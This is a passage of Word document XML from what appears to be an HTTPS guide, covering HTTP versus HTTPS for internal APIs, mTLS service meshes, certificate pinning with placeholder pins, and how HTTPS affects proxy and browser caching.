    <w:p w14:paraId="0042669D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Internal APIs — HTTP or HTTPS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E673901" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arguments for HTTP internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29029609" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No certificate management overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342A1BA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Lower latency (no handshake).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E435369" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Simpler debugging (can inspect traffic with tcpdump).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E399C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"The internal network is trusted."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018EDE02" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arguments for HTTPS internally (defense in depth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E7921F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The internal network is NOT always trustworthy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD8D39" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Compromised host can sniff lateral traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FA079" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cloud environments have shared physical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BF07D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Supply chain attacks compromise internal tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985BD89" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Compliance requirements (PCI-DSS, HIPAA, SOC2) often mandate encryption everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4E73F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Zero-trust architecture assumes the network is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE81163" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The modern approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> mTLS via service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFD0F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Encryption everywhere without application changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763070F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service identity verification (not just encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69A5E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sidecar handles all crypto transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DFBA9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Centralized certificate management via control plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C6873" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Certificate Pinning for APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBFC663" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mobile apps communicating with their backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212AB02A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Hardcode the expected certificate (or public key hash) in the app binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4F9D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0E0D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Expected pins: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281E0274" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  sha256/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=,  // primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250E306" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  sha256/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC=   // backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14223094" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE579B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163DE35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents CA compromise from affecting your users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F504555" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents government-issued rogue certificates from intercepting traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580C2EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents corporate MITM proxies from reading your app's traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C28C1B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85E6D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Key rotation requires app update. If you pin the leaf certificate and it expires, users with old app versions can't connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F48ED6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Pin the PUBLIC KEY instead (survives certificate renewal if you reuse the same key pair).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35184FFB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Always include a backup pin (for emergency rotation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C1186B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="233387E9">
          <v:rect id="_x0000_i3989" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2783F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. HTTPS and Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475BC548" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 How HTTPS Affects Proxy Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AC2992" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Transparent caching proxies (ISP, corporate) can cache responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C39012" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>User A requests http://example.com/large-file.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7AC7B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy caches the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BEA9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>User B requests the same URL → served from proxy cache (no origin hit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52740836" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Proxies CANNOT cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BD988" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Traffic is encrypted end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C850F0B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The proxy sees only opaque bytes — can't identify URLs, can't match cache keys, can't store/serve responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F14A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every request must go to the origin (or a CDN edge that terminates TLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7333D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why CDNs matter even more with HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA58155" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The CDN edge terminates TLS → can cache responses BEHIND the TLS layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F4902" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Subsequent requests from nearby clients are served from CDN cache (low latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680B53C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Without a CDN, HTTPS eliminates all intermediate caching → higher origin load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B57AAA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Browser Caching Still Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672FAA9D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTPS does NOT prevent the browser from caching responses locally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB14797" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cache-Control: max-age=3600 → browser caches for 1 hour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E143DAD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Responses are stored in the browser's disk/memory cache (decrypted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EFD2D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Next request for the same resource → served from local cache (no network at all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D936D68" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security consideration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Cached HTTPS responses on disk are stored unencrypted. On shared computers, this is a risk. Use Cache-Control: no-store for sensitive responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD90240" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="0AF1C080">
          <v:rect id="_x0000_i3990" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38386E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
